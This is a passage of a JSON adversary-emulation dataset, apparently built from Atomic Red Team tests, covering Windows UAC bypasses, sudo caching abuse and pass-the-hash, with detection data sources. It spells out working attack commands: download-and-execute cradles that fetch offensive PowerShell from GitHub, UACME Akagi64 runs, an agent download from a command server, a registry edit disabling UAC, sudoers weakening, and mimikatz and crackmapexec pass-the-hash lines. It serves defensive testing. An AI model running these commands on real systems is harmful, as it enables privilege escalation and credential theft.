#{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 33", + "auto_generated_guid": "e514bb03-f71c-4b22-9092-9f961ec6fb03", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: winscripting.blog\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\fodhelper.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodMsSettings2\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\33 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 34", + "auto_generated_guid": "695b2dac-423e-448e-b6ef-5b88e93011d6", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: James Forshaw\n\nType:\tShell API\n\nMethod: Environment variables expansion\n\nTarget:\t\\system32\\svchost.exe via \\system32\\schtasks.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDiskCleanupEnvironmentVariable\n\nUCM Method:\tUacMethodDiskSilentCleanup\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\34 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 39", + "auto_generated_guid": "56163687-081f-47da-bb9c-7b231c5585cf", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Stefan Kanthak\n\nType:\tDll Hijack\n\nMethod: .NET Code Profiler\n\nTarget:\t\\system32\\mmc.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmCorProfilerMethod\n\nUCM Method:\tUacMethodCorProfiler\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\39 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 56", + "auto_generated_guid": "235ec031-cd2d-465d-a7ae-68bab281e80e", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Hashim Jawad\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\WSReset.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodShellWSReset\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\56 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 59", + "auto_generated_guid": "dfb1b667-4bb8-4a63-a85e-29936ea75f29", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: James Forshaw\n\nType:\tAppInfo ALPC\n\nMethod: RAiLaunchAdminProcess and DebugObject\n\nTarget:\tAttacker defined\n\nComponent:\tAttacker defined\n\nImplementation:\tucmDebugObjectMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\59 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "UACME Bypass Method 61", + "auto_generated_guid": "7825b576-744c-4555-856d-caf3460dc236", + "description": "Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.\nNote: The cleanup_command's which kill the spawned cmd and event viewer processes only work if run as admin.\n\nAuthor: Enigma0x3/bytecode77 derivative by Nassim Asrir\n\nType:\tShell API\n\nMethod: Registry key manipulation\n\nTarget:\t\\system32\\slui.exe, \\system32\\changepk.exe\n\nComponent:\tAttacker defined\n\nImplementation:\tucmShellRegModMethod\n\nUCM Method:\tUacMethodDebugObject\n\nhttps://github.com/hfiref0x/UACME\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "uacme_exe": { + "description": "Path to uacme executable", + "type": "Path", + "default": "%temp%\\uacme\\61 Akagi64.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "UACME executable must exist on disk at specified location (#{uacme_exe})\n", + "prereq_command": "$tempPath = cmd /c echo #{uacme_exe}\nif (Test-Path \"$tempPath\") {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1548.002/bin/uacme.zip\" -OutFile \"$env:TEMP\\uacme.zip\"\nExpand-Archive $env:TEMP\\uacme.zip $env:TEMP\\uacme -Force\nRemove-Item $env:TEMP\\uacme.zip -Force\n" + } + ], + "executor": { + "command": "\"#{uacme_exe}\"\n", + "cleanup_command": "powershell Stop-Process -Name cmd -Force -ErrorAction Ignore\npowershell Stop-Process -Name mmc -Force -ErrorAction Ignore\n", + "name": "command_prompt" + } + }, + { + "name": "WinPwn - UAC Magic", + "auto_generated_guid": "964d8bf8-37bc-4fd3-ba36-ad13761ebbcc", + "description": "UAC bypass using Magic technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique magic", + "name": "powershell" + } + }, + { + "name": "WinPwn - UAC Bypass ccmstp technique", + "auto_generated_guid": "f3c145f9-3c8d-422c-bd99-296a17a8f567", + "description": "UAC bypass using ccmstp technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\calc.exe\" -technique ccmstp", + "name": "powershell" + } + }, + { + "name": "WinPwn - UAC Bypass DiskCleanup technique", + "auto_generated_guid": "1ed67900-66cd-4b09-b546-2a0ef4431a0c", + "description": "UAC bypass using DiskCleanup technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nUACBypass -noninteractive -command \"C:\\windows\\system32\\cmd.exe\" -technique DiskCleanup", + "name": "powershell" + } + }, + { + "name": "WinPwn - UAC Bypass DccwBypassUAC technique", + "auto_generated_guid": "2b61977b-ae2d-4ae4-89cb-5c36c89586be", + "description": "UAC Bypass DccwBypassUAC technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')", + "name": "powershell" + } + } + ] + }, + { + "description": "Set a registry key to allow UAC bypass", + "id": "665432a4-42e7-4ee1-af19-a9a8c9455d0c", + "name": "UAC bypass registry", + "platforms": { + "windows": { + "psh": { + "command": "New-ItemProperty -Path HKLM:Software\\Microsoft\\Windows\\CurrentVersion\\policies\\system -Name EnableLUA -PropertyType DWord -Value 0 -Force\n" + } + } + }, + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + } + }, + { + "id": "95ad5d69-563e-477b-802b-4855bfb3be09", + "description": "Dll Hijack of WOW64 logger wow64log.dll using Akagi.exe", + "name": "wow64log DLL Hijack", + "platforms": { + "windows": { + "cmd,psh": { + "command": ".\\Akagi64.exe 30 C:\\Windows\\System32\\cmd.exe\n", + "payloads": [ + "Akagi64.exe" + ] + } + } + }, + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + } + }, + { + "id": "b7344901-0b02-4ead-baf6-e3f629ed545f", + "description": "executes the slui exe file handler hijack", + "name": "Slui File Handler Hijack", + "platforms": { + "windows": { + "psh": { + "command": ".\\Akagi64.exe 45 C:\\Windows\\System32\\cmd.exe\n", + "payloads": [ + "Akagi64.exe" + ] + } + } + }, + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + } + }, + { + "id": "e3db134c-4aed-4c5a-9607-c50183c9ef9e", + "name": "Bypass UAC Medium", + "description": "Bypass user account controls - medium", + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + }, + "platforms": { + "windows": { + "psh": { + "command": "$url=\"#{server}/file/download\"; $wc=New-Object System.Net.WebClient; $wc.Headers.add(\"platform\",\"windows\"); $wc.Headers.add(\"file\",\"sandcat.go\"); $data=$wc.DownloadData($url); $name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"); [io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n$job = Start-Job -ScriptBlock { Import-Module -Name .\\Bypass-UAC.ps1; Bypass-UAC -Command \"C:\\Users\\Public\\$name.exe -group #{group}\"; };\nReceive-Job -Job $job -Wait;\n", + "payloads": [ + "Bypass-UAC.ps1" + ] + } + } + } + }, + { + "id": "e99cce5c-cb7e-4a6e-8a09-1609a221b90a", + "description": "UIPI bypass with uiAccess application", + "name": "duser/osksupport DLL Hijack", + "platforms": { + "windows": { + "psh": { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$wc.Headers.add(\"defaultSleep\",\"60\");\n$wc.Headers.add(\"defaultGroup\",\"bypassed_u_bro\");\n$data=$wc.DownloadData($url);\n$name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\");\n[io.file]::WriteAllBytes(\"C:\\Users\\Public\\$name.exe\",$data);\n.\\Akagi64.exe 32 \"C:\\Users\\Public\\$name.exe -server #{server}\"\n", + "payloads": [ + "Akagi64.exe" + ] + } + } + }, + "tactic": "privilege-escalation", + "technique": { + "attack_id": "T1548.002", + "name": "Abuse Elevation Control Mechanism: Bypass User Access Control" + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1548.003", + "command_list": [ + "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n", + "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n", + "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers" + ], + "commands": [ + { + "command": "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n", + "source": "atomics/T1548.003/T1548.003.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" + }, + { + "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n", + "source": "atomics/T1548.003/T1548.003.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" + }, + { + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers", + "source": "atomics/T1548.003/T1548.003.yaml", + "name": "Atomic Red Team Test - Abuse Elevation Control Mechanism: Sudo and Sudo Caching" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1548.003", + "display_name": "Abuse Elevation Control Mechanism: Sudo and Sudo Caching", + "atomic_tests": [ + { + "name": "Sudo usage", + "auto_generated_guid": "150c3a08-ee6e-48a6-aeaf-3659d24ceb4e", + "description": "Common Sudo enumeration methods.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo -l \nsudo cat /etc/sudoers\nsudo vim /etc/sudoers\n" + } + }, + { + "name": "Unlimited sudo cache timeout", + "auto_generated_guid": "a7b17659-dd5e-46f7-b7d1-e6792c91d0bc", + "description": "Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers\nsudo visudo -c -f /etc/sudoers\n" + } + }, + { + "name": "Disable tty_tickets for sudo caching", + "auto_generated_guid": "91a60b03-fb75-4d24-a42e-2eb8956e8de1", + "description": "Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "executor": { + "name": "sh", + "elevation_required": true, + "command": "sudo sh -c \"echo Defaults \"'!'\"tty_tickets >> /etc/sudoers\"\nsudo visudo -c -f /etc/sudoers" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process metadata", + "description": "Data and information that describe a process (Such as environment variables) and activity around it.", + "source_data_element": "user", + "relationship": "retrieved information about", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1550.002", + "command_list": [ + "#{mimikatz_path} \"sekurlsa::pth /user:Administrator /domain:#{domain} /ntlm:#{ntlm}\"\n", + "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:cc36cf7a8514893efccd3324464tkg1a\"\n", + "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:%userdnsdomain% /ntlm:#{ntlm}\"\n", + "%tmp%\\mimikatz\\x64\\mimikatz.exe \"sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}\"\n", + "#{crackmapexec_exe} #{domain} -u Administrator -H #{ntlm} -x #{command}\n", + "C:\\CrackMapExecWin\\crackmapexec.exe #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n", + "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x whoami\n", + "#{crackmapexec_exe} #{domain} -u #{user_name} -H cc36cf7a8514893efccd3324464tkg1a -x #{command}\n", + "#{crackmapexec_exe} %userdnsdomain% -u #{user_name} -H #{ntlm} -x #{command}\n", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash cc36cf7a8514893efccd3324464tkg1a -Command #{command}", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username Administrator -Hash #{ntlm} -Command #{command}", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command hostname", + "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username #{user_name} -Hash #{ntlm} -Command #{command}" + ], + "commands": [ + { + "command": "#{mimikatz_path} \"sekurlsa::pth /user:Administrator /domain:#{domain} /ntlm:#{ntlm}\"\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:cc36cf7a8514893efccd3324464tkg1a\"\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{mimikatz_path} \"sekurlsa::pth /user:#{user_name} /domain:%userdnsdomain% /ntlm:#{ntlm}\"\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "%tmp%\\mimikatz\\x64\\mimikatz.exe \"sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}\"\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{crackmapexec_exe} #{domain} -u Administrator -H #{ntlm} -x #{command}\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "C:\\CrackMapExecWin\\crackmapexec.exe #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n", + "source": "atomics/T1550.002/T1550.002.yaml", + "name": "Atomic Red Team Test - Use Alternate Authentication Material: Pass the Hash" + }, + { + "command": "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x 